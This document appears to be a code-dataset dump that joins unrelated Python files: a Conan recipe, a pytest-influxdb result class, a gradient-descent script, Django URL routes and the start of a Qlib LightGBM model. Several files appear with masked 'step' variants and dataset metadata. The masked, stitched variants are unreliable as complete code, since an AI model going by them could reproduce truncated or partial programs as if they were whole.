self.copy('*.dylib*', dst='lib', keep_path=False)\n self.copy('*.so', dst='lib', keep_path=False)\n self.copy('*.a', dst='lib', keep_path=False)\n",
"step-5": "from conans import ConanFile, CMake, tools\nimport os\n\nclass Demo(ConanFile):\n name = \"Demo\"\n version = \"0.1\"\n license = \"<Put the package license here>\"\n url = \"<Package recipe repository url here, for issues about the package>\"\n description = \"<Description of Testlib here>\"\n settings = \"os\", \"compiler\", \"build_type\", \"arch\"\n options = {\"shared\": [True, False]}\n default_options = \"shared=False\"\n generators = \"cmake\"\n exports_sources = \"src/*\"\n requires = \"TestLib/0.1@gbmhunter/testing\"\n\n def build(self):\n cmake = CMake(self) \n cmake.configure(source_folder=\"src/\")\n\n print('BLAHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH = ' + str(self.deps_cpp_info[\"TestLib\"]))\n cmake.build()\n\n def imports(self):\n self.copy(\"*.dll\", dst=\"bin\", src=\"bin\")\n self.copy(\"*.dylib*\", dst=\"bin\", src=\"lib\")\n self.copy('*.so*', dst='bin', src='lib')\n\n def test(self):\n if not tools.cross_building(self.settings):\n os.chdir(\"bin\")\n self.run(\".%sexample\" % os.sep)\n\n def package(self):\n self.copy(\"*.h\", dst=\"include\", src=\"src\")\n self.copy(\"*.lib\", dst=\"lib\", keep_path=False)\n self.copy(\"*.dll\", dst=\"bin\", keep_path=False)\n self.copy(\"*.dylib*\", dst=\"lib\", keep_path=False)\n self.copy(\"*.so\", dst=\"lib\", keep_path=False)\n self.copy(\"*.a\", dst=\"lib\", keep_path=False)",
"step-ids": [
3,
4,
5,
6,
8
]
}
|
[
3,
4,
5,
6,
8
] |
import json
import time
from pytest_influxdb.data_manager import DataManager
class SuiteResultDTO:
__run = 'UNDEFINED'
__project = 'UNDEFINED'
__version = 'UNDEFINED'
__passed = None
__failed = None
__skipped = None
__error = None
__duration_sec = 0
__disabled = 0
__retries = 0
__suite_result_dict = {'tags': {}, 'fields': {}}
def set_run(self, run):
if run != '':
self.__run = str(run)
def set_project(self, project):
if project != '':
self.__project = str(project)
def set_version(self, version):
if version != '':
self.__version = str(version)
def set_passed(self, passed):
self.__passed = int(passed)
def set_failed(self, failed):
self.__failed = int(failed)
def set_skipped(self, skipped):
self.__skipped = int(skipped)
def set_error(self, error):
self.__error = int(error)
def set_duration_sec(self, duration_sec):
self.__duration_sec = int(duration_sec)
def set_disabled(self, disabled):
self.__disabled = int(disabled)
def set_retries(self, retries):
self.__retries = int(retries)
def set_suite_result_dict(self, suite_result_dict):
SuiteResultDTO.__suite_result_dict = suite_result_dict
def get_suite_json(self, measurement_name):
json_body = [
{
"measurement": measurement_name,
"tags": {
"run": self.__run,
"project": self.__project,
"version": self.__version
},
"fields": {
"pass": self.__passed,
"fail": self.__failed,
"skip": self.__skipped,
"error": self.__error,
"disabled": self.__disabled,
"duration_sec": self.__duration_sec,
"retries": self.__retries
}
}
]
# Appending custom values to json_body
tags_dict = SuiteResultDTO.__suite_result_dict['tags']
for key in tags_dict:
suite_tags = json_body[0]['tags']
suite_tags.update({key: tags_dict[key]})
fields_dict = SuiteResultDTO.__suite_result_dict['fields']
for key in fields_dict:
suite_fields = json_body[0]['fields']
suite_fields.update({key: fields_dict[key]})
return json_body
def set_tag_values(self, tags_dict):
suite_tags = SuiteResultDTO.__suite_result_dict
suite_tags['tags'].update(tags_dict)
def set_field_values(self, fields_dict):
suite_fields = SuiteResultDTO.__suite_result_dict
suite_fields['fields'].update(fields_dict)
def set_suite_custom_values(self, influxdb_values):
if influxdb_values and influxdb_values != '':
if isinstance(influxdb_values, str):
influxdb_values = json.loads(influxdb_values)
self.set_field_values(influxdb_values['fields']['suite_result'])
self.set_tag_values(influxdb_values['tags']['suite_result'])
def get_suite_result_dto(self, terminalreporter, global_values, influxdb_components, db_measurement_name_for_suite):
# Preparing execution time and suite results from the terminalreporter (where all the data collected)
execution_time = round(time.time() - terminalreporter._sessionstarttime)
suite_results_dict = DataManager().get_results_dict(terminalreporter.stats)
# Setting the values to the suite_result_dto instance
self.set_passed(suite_results_dict.get('passed'))
self.set_failed(suite_results_dict.get('failed'))
self.set_skipped(suite_results_dict.get('skipped'))
self.set_error(suite_results_dict.get('error'))
self.set_disabled(suite_results_dict.get('disabled'))
self.set_duration_sec(execution_time)
self.set_retries(suite_results_dict.get('reruns'))
self.set_run(global_values.get("run"))
self.set_project(global_values.get("project"))
self.set_version(global_values.get("version"))
self.set_suite_custom_values(global_values.get("influxdb_values"))
self.merge_suite_result(global_values.get('merged'), influxdb_components,
db_measurement_name_for_suite, global_values.get("run"))
return self
def merge_suite_result(self, merged_enabled, influxdb_components, db_measurement_name_for_suite, run_id_value):
# Merging the existing suite results with the suite_results from db for the same run
# if 'merged' config value is True
existing_suite_result = influxdb_components.get_results_by_run(db_measurement_name_for_suite, run_id_value)
old_suite_list = list(existing_suite_result.get_points(measurement=f'{db_measurement_name_for_suite}'))
if len(old_suite_list) != 0 and merged_enabled:
old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[0]['fail'] + old_suite_list[0][
'skip']
old_disabled_tests_count = old_suite_list[0]['disabled']
self.set_passed(
old_suite_total_count - self.__failed - self.__skipped)
self.set_disabled(old_disabled_tests_count)
influxdb_components.delete_results_by_run(db_measurement_name_for_suite, run_id_value)
|
normal
|
{
"blob_id": "84c3427a994bd6c57d9fa8449e4fc7a3de801170",
"index": 9271,
"step-1": "<mask token>\n\n\nclass SuiteResultDTO:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n <mask token>\n <mask token>\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n <mask token>\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n <mask token>\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values,\n influxdb_components, db_measurement_name_for_suite):\n execution_time = round(time.time() - terminalreporter._sessionstarttime\n )\n suite_results_dict = DataManager().get_results_dict(terminalreporter\n .stats)\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get('run'))\n self.set_project(global_values.get('project'))\n self.set_version(global_values.get('version'))\n self.set_suite_custom_values(global_values.get('influxdb_values'))\n self.merge_suite_result(global_values.get('merged'),\n influxdb_components, db_measurement_name_for_suite,\n global_values.get('run'))\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components,\n db_measurement_name_for_suite, run_id_value):\n existing_suite_result = influxdb_components.get_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n old_suite_list = list(existing_suite_result.get_points(measurement=\n f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[\n 0]['fail'] + old_suite_list[0]['skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(old_suite_total_count - self.__failed - self.\n __skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n",
"step-2": "<mask token>\n\n\nclass SuiteResultDTO:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n <mask token>\n\n def set_failed(self, failed):\n self.__failed = int(failed)\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n <mask token>\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n <mask token>\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values,\n influxdb_components, db_measurement_name_for_suite):\n execution_time = round(time.time() - terminalreporter._sessionstarttime\n )\n suite_results_dict = DataManager().get_results_dict(terminalreporter\n .stats)\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get('run'))\n self.set_project(global_values.get('project'))\n self.set_version(global_values.get('version'))\n self.set_suite_custom_values(global_values.get('influxdb_values'))\n self.merge_suite_result(global_values.get('merged'),\n influxdb_components, db_measurement_name_for_suite,\n global_values.get('run'))\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components,\n db_measurement_name_for_suite, run_id_value):\n existing_suite_result = influxdb_components.get_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n old_suite_list = list(existing_suite_result.get_points(measurement=\n f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[\n 0]['fail'] + old_suite_list[0]['skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(old_suite_total_count - self.__failed - self.\n __skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n",
"step-3": "<mask token>\n\n\nclass SuiteResultDTO:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def set_run(self, run):\n if run != '':\n self.__run = str(run)\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n <mask token>\n\n def set_failed(self, failed):\n self.__failed = int(failed)\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n <mask token>\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n <mask token>\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values,\n influxdb_components, db_measurement_name_for_suite):\n execution_time = round(time.time() - terminalreporter._sessionstarttime\n )\n suite_results_dict = DataManager().get_results_dict(terminalreporter\n .stats)\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get('run'))\n self.set_project(global_values.get('project'))\n self.set_version(global_values.get('version'))\n self.set_suite_custom_values(global_values.get('influxdb_values'))\n self.merge_suite_result(global_values.get('merged'),\n influxdb_components, db_measurement_name_for_suite,\n global_values.get('run'))\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components,\n db_measurement_name_for_suite, run_id_value):\n existing_suite_result = influxdb_components.get_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n old_suite_list = list(existing_suite_result.get_points(measurement=\n f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[\n 0]['fail'] + old_suite_list[0]['skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(old_suite_total_count - self.__failed - self.\n __skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n",
"step-4": "<mask token>\n\n\nclass SuiteResultDTO:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def set_run(self, run):\n if run != '':\n self.__run = str(run)\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n <mask token>\n\n def set_failed(self, failed):\n self.__failed = int(failed)\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n <mask token>\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n\n def get_suite_json(self, measurement_name):\n json_body = [{'measurement': measurement_name, 'tags': {'run': self\n .__run, 'project': self.__project, 'version': self.__version},\n 'fields': {'pass': self.__passed, 'fail': self.__failed, 'skip':\n self.__skipped, 'error': self.__error, 'disabled': self.\n __disabled, 'duration_sec': self.__duration_sec, 'retries':\n self.__retries}}]\n tags_dict = SuiteResultDTO.__suite_result_dict['tags']\n for key in tags_dict:\n suite_tags = json_body[0]['tags']\n suite_tags.update({key: tags_dict[key]})\n fields_dict = SuiteResultDTO.__suite_result_dict['fields']\n for key in fields_dict:\n suite_fields = json_body[0]['fields']\n suite_fields.update({key: fields_dict[key]})\n return json_body\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values,\n influxdb_components, db_measurement_name_for_suite):\n execution_time = round(time.time() - terminalreporter._sessionstarttime\n )\n suite_results_dict = DataManager().get_results_dict(terminalreporter\n .stats)\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get('run'))\n self.set_project(global_values.get('project'))\n self.set_version(global_values.get('version'))\n self.set_suite_custom_values(global_values.get('influxdb_values'))\n self.merge_suite_result(global_values.get('merged'),\n influxdb_components, db_measurement_name_for_suite,\n global_values.get('run'))\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components,\n db_measurement_name_for_suite, run_id_value):\n existing_suite_result = influxdb_components.get_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n old_suite_list = list(existing_suite_result.get_points(measurement=\n f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[\n 0]['fail'] + old_suite_list[0]['skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(old_suite_total_count - self.__failed - self.\n __skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(\n db_measurement_name_for_suite, run_id_value)\n",
"step-5": "import json\nimport time\n\nfrom pytest_influxdb.data_manager import DataManager\n\n\nclass SuiteResultDTO:\n __run = 'UNDEFINED'\n __project = 'UNDEFINED'\n __version = 'UNDEFINED'\n __passed = None\n __failed = None\n __skipped = None\n __error = None\n __duration_sec = 0\n __disabled = 0\n __retries = 0\n __suite_result_dict = {'tags': {}, 'fields': {}}\n\n def set_run(self, run):\n if run != '':\n self.__run = str(run)\n\n def set_project(self, project):\n if project != '':\n self.__project = str(project)\n\n def set_version(self, version):\n if version != '':\n self.__version = str(version)\n\n def set_passed(self, passed):\n self.__passed = int(passed)\n\n def set_failed(self, failed):\n self.__failed = int(failed)\n\n def set_skipped(self, skipped):\n self.__skipped = int(skipped)\n\n def set_error(self, error):\n self.__error = int(error)\n\n def set_duration_sec(self, duration_sec):\n self.__duration_sec = int(duration_sec)\n\n def set_disabled(self, disabled):\n self.__disabled = int(disabled)\n\n def set_retries(self, retries):\n self.__retries = int(retries)\n\n def set_suite_result_dict(self, suite_result_dict):\n SuiteResultDTO.__suite_result_dict = suite_result_dict\n\n def get_suite_json(self, measurement_name):\n json_body = [\n {\n \"measurement\": measurement_name,\n \"tags\": {\n \"run\": self.__run,\n \"project\": self.__project,\n \"version\": self.__version\n },\n \"fields\": {\n \"pass\": self.__passed,\n \"fail\": self.__failed,\n \"skip\": self.__skipped,\n \"error\": self.__error,\n \"disabled\": self.__disabled,\n \"duration_sec\": self.__duration_sec,\n \"retries\": self.__retries\n }\n }\n ]\n\n # Appending custom values to json_body\n tags_dict = SuiteResultDTO.__suite_result_dict['tags']\n for key in tags_dict:\n suite_tags = json_body[0]['tags']\n suite_tags.update({key: tags_dict[key]})\n fields_dict = SuiteResultDTO.__suite_result_dict['fields']\n for key in fields_dict:\n suite_fields = json_body[0]['fields']\n suite_fields.update({key: fields_dict[key]})\n\n return json_body\n\n def set_tag_values(self, tags_dict):\n suite_tags = SuiteResultDTO.__suite_result_dict\n suite_tags['tags'].update(tags_dict)\n\n def set_field_values(self, fields_dict):\n suite_fields = SuiteResultDTO.__suite_result_dict\n suite_fields['fields'].update(fields_dict)\n\n def set_suite_custom_values(self, influxdb_values):\n if influxdb_values and influxdb_values != '':\n if isinstance(influxdb_values, str):\n influxdb_values = json.loads(influxdb_values)\n self.set_field_values(influxdb_values['fields']['suite_result'])\n self.set_tag_values(influxdb_values['tags']['suite_result'])\n\n def get_suite_result_dto(self, terminalreporter, global_values, influxdb_components, db_measurement_name_for_suite):\n # Preparing execution time and suite results from the terminalreporter (where all the data collected)\n execution_time = round(time.time() - terminalreporter._sessionstarttime)\n suite_results_dict = DataManager().get_results_dict(terminalreporter.stats)\n # Setting the values to the suite_result_dto instance\n self.set_passed(suite_results_dict.get('passed'))\n self.set_failed(suite_results_dict.get('failed'))\n self.set_skipped(suite_results_dict.get('skipped'))\n self.set_error(suite_results_dict.get('error'))\n self.set_disabled(suite_results_dict.get('disabled'))\n self.set_duration_sec(execution_time)\n self.set_retries(suite_results_dict.get('reruns'))\n self.set_run(global_values.get(\"run\"))\n self.set_project(global_values.get(\"project\"))\n self.set_version(global_values.get(\"version\"))\n self.set_suite_custom_values(global_values.get(\"influxdb_values\"))\n\n self.merge_suite_result(global_values.get('merged'), influxdb_components,\n db_measurement_name_for_suite, global_values.get(\"run\"))\n\n return self\n\n def merge_suite_result(self, merged_enabled, influxdb_components, db_measurement_name_for_suite, run_id_value):\n # Merging the existing suite results with the suite_results from db for the same run\n # if 'merged' config value is True\n existing_suite_result = influxdb_components.get_results_by_run(db_measurement_name_for_suite, run_id_value)\n old_suite_list = list(existing_suite_result.get_points(measurement=f'{db_measurement_name_for_suite}'))\n if len(old_suite_list) != 0 and merged_enabled:\n old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[0]['fail'] + old_suite_list[0][\n 'skip']\n old_disabled_tests_count = old_suite_list[0]['disabled']\n self.set_passed(\n old_suite_total_count - self.__failed - self.__skipped)\n self.set_disabled(old_disabled_tests_count)\n influxdb_components.delete_results_by_run(db_measurement_name_for_suite, run_id_value)\n",
"step-ids": [
13,
14,
15,
16,
21
]
}
|
[
13,
14,
15,
16,
21
] |
n = 0.3
c = 2
def func(x):
return x**c
def der_func(x):
return c * x**(c - 1)
def na_value(x):
return x - n*der_func(x)
def main():
x = 100
v_min = func(x)
for i in range(10):
cur_v = func(x)
x = na_value(x)
if cur_v < v_min:
v_min = cur_v
print("----> " ,i ," cur = ",cur_v," x = ",x," v_min = " ,v_min )
main()
|
normal
|
{
"blob_id": "fa7246a4e7595393ca9aaec777fa85d782bb816e",
"index": 4815,
"step-1": "<mask token>\n\n\ndef func(x):\n return x ** c\n\n\ndef der_func(x):\n return c * x ** (c - 1)\n\n\n<mask token>\n\n\ndef main():\n x = 100\n v_min = func(x)\n for i in range(10):\n cur_v = func(x)\n x = na_value(x)\n if cur_v < v_min:\n v_min = cur_v\n print('----> ', i, ' cur = ', cur_v, ' x = ', x, ' v_min = ', v_min)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef func(x):\n return x ** c\n\n\ndef der_func(x):\n return c * x ** (c - 1)\n\n\ndef na_value(x):\n return x - n * der_func(x)\n\n\ndef main():\n x = 100\n v_min = func(x)\n for i in range(10):\n cur_v = func(x)\n x = na_value(x)\n if cur_v < v_min:\n v_min = cur_v\n print('----> ', i, ' cur = ', cur_v, ' x = ', x, ' v_min = ', v_min)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef func(x):\n return x ** c\n\n\ndef der_func(x):\n return c * x ** (c - 1)\n\n\ndef na_value(x):\n return x - n * der_func(x)\n\n\ndef main():\n x = 100\n v_min = func(x)\n for i in range(10):\n cur_v = func(x)\n x = na_value(x)\n if cur_v < v_min:\n v_min = cur_v\n print('----> ', i, ' cur = ', cur_v, ' x = ', x, ' v_min = ', v_min)\n\n\nmain()\n",
"step-4": "n = 0.3\nc = 2\n\n\ndef func(x):\n return x ** c\n\n\ndef der_func(x):\n return c * x ** (c - 1)\n\n\ndef na_value(x):\n return x - n * der_func(x)\n\n\ndef main():\n x = 100\n v_min = func(x)\n for i in range(10):\n cur_v = func(x)\n x = na_value(x)\n if cur_v < v_min:\n v_min = cur_v\n print('----> ', i, ' cur = ', cur_v, ' x = ', x, ' v_min = ', v_min)\n\n\nmain()\n",
"step-5": "\nn = 0.3\nc = 2\n\ndef func(x):\n return x**c \n\ndef der_func(x):\n return c * x**(c - 1)\n\ndef na_value(x):\n return x - n*der_func(x)\n\ndef main():\n x = 100\n v_min = func(x)\n for i in range(10):\n cur_v = func(x)\n x = na_value(x)\n if cur_v < v_min:\n v_min = cur_v\n print(\"----> \" ,i ,\" cur = \",cur_v,\" x = \",x,\" v_min = \" ,v_min )\n\n\nmain()",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index_view, name='accounts.index'),
url(r'^login/$', views.login_view, name='accounts.login'),
url(r'^logout/$', views.logout_view, name='accounts.logout'),
url(r'^registro/$', views.registro_usuario_view, name='accounts.registro'),
url(r'obrigado/(?P<username>[\w]+)/$', views.obrigado_view, name='accounts.obrigado'),
url(r'^ataque/$', views.ataque_view, name='accounts.ataque'),
url(r'^flpositivo/$', views.falsoLoginPositivo_view, name='accounts.flpositivo'),
url(r'^flnegativo/$', views.falsoLoginNegativo_view, name='accounts.flnegativo'),
]
|
normal
|
{
"blob_id": "b4d09b6d8ad5f0584f74adc0fd8116265bb6649b",
"index": 4641,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^$', views.index_view, name='accounts.index'), url(\n '^login/$', views.login_view, name='accounts.login'), url('^logout/$',\n views.logout_view, name='accounts.logout'), url('^registro/$', views.\n registro_usuario_view, name='accounts.registro'), url(\n 'obrigado/(?P<username>[\\\\w]+)/$', views.obrigado_view, name=\n 'accounts.obrigado'), url('^ataque/$', views.ataque_view, name=\n 'accounts.ataque'), url('^flpositivo/$', views.falsoLoginPositivo_view,\n name='accounts.flpositivo'), url('^flnegativo/$', views.\n falsoLoginNegativo_view, name='accounts.flnegativo')]\n",
"step-3": "from django.conf.urls import url\nfrom . import views\nurlpatterns = [url('^$', views.index_view, name='accounts.index'), url(\n '^login/$', views.login_view, name='accounts.login'), url('^logout/$',\n views.logout_view, name='accounts.logout'), url('^registro/$', views.\n registro_usuario_view, name='accounts.registro'), url(\n 'obrigado/(?P<username>[\\\\w]+)/$', views.obrigado_view, name=\n 'accounts.obrigado'), url('^ataque/$', views.ataque_view, name=\n 'accounts.ataque'), url('^flpositivo/$', views.falsoLoginPositivo_view,\n name='accounts.flpositivo'), url('^flnegativo/$', views.\n falsoLoginNegativo_view, name='accounts.flnegativo')]\n",
"step-4": "from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index_view, name='accounts.index'),\n url(r'^login/$', views.login_view, name='accounts.login'),\n url(r'^logout/$', views.logout_view, name='accounts.logout'),\n url(r'^registro/$', views.registro_usuario_view, name='accounts.registro'),\n url(r'obrigado/(?P<username>[\\w]+)/$', views.obrigado_view, name='accounts.obrigado'),\n url(r'^ataque/$', views.ataque_view, name='accounts.ataque'),\n url(r'^flpositivo/$', views.falsoLoginPositivo_view, name='accounts.flpositivo'),\n url(r'^flnegativo/$', views.falsoLoginNegativo_view, name='accounts.flnegativo'),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from xai.brain.wordbase.adjectives._corporal import _CORPORAL
#calss header
class _CORPORALS(_CORPORAL, ):
def __init__(self,):
_CORPORAL.__init__(self)
self.name = "CORPORALS"
self.specie = 'adjectives'
self.basic = "corporal"
self.jsondata = {}
|
normal
|
{
"blob_id": "d2787f17a46cf0db9aeea82f1b97ee8d630fd28a",
"index": 8932,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass _CORPORALS(_CORPORAL):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass _CORPORALS(_CORPORAL):\n\n def __init__(self):\n _CORPORAL.__init__(self)\n self.name = 'CORPORALS'\n self.specie = 'adjectives'\n self.basic = 'corporal'\n self.jsondata = {}\n",
"step-4": "from xai.brain.wordbase.adjectives._corporal import _CORPORAL\n\n\nclass _CORPORALS(_CORPORAL):\n\n def __init__(self):\n _CORPORAL.__init__(self)\n self.name = 'CORPORALS'\n self.specie = 'adjectives'\n self.basic = 'corporal'\n self.jsondata = {}\n",
"step-5": "\n\nfrom xai.brain.wordbase.adjectives._corporal import _CORPORAL\n\n#calss header\nclass _CORPORALS(_CORPORAL, ):\n\tdef __init__(self,): \n\t\t_CORPORAL.__init__(self)\n\t\tself.name = \"CORPORALS\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"corporal\"\n\t\tself.jsondata = {}\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import numpy as np
import pandas as pd
import lightgbm as lgb
from typing import List, Text, Tuple, Union
from ...model.base import ModelFT
from ...data.dataset import DatasetH
from ...data.dataset.handler import DataHandlerLP
from ...model.interpret.base import LightGBMFInt
from ...data.dataset.weight import Reweighter
from qlib.workflow import R
class LGBModel(ModelFT, LightGBMFInt):
"""LightGBM Model"""
def __init__(self, loss="mse", early_stopping_rounds=50, num_boost_round=1000, **kwargs):
if loss not in {"mse", "binary"}:
raise NotImplementedError
self.params = {"objective": loss, "verbosity": -1}
self.params.update(kwargs)
self.early_stopping_rounds = early_stopping_rounds
self.num_boost_round = num_boost_round
self.model = None
def _prepare_data(self, dataset: DatasetH, reweighter=None) -> List[Tuple[lgb.Dataset, str]]:
"""
The motivation of current version is to make validation optional
- train segment is necessary;
"""
ds_l = []
assert "train" in dataset.segments
for key in ["train", "valid"]:
if key in dataset.segments:
df = dataset.prepare(key, col_set=["feature", "label"], data_key=DataHandlerLP.DK_L)
if df.empty:
raise ValueError("Empty data from dataset, please check your dataset config.")
x, y = df["feature"], df["label"]
# Lightgbm need 1D array as its label
if y.values.ndim == 2 and y.values.shape[1] == 1:
y = np.squeeze(y.values)
else:
raise ValueError("LightGBM doesn't support multi-label training")
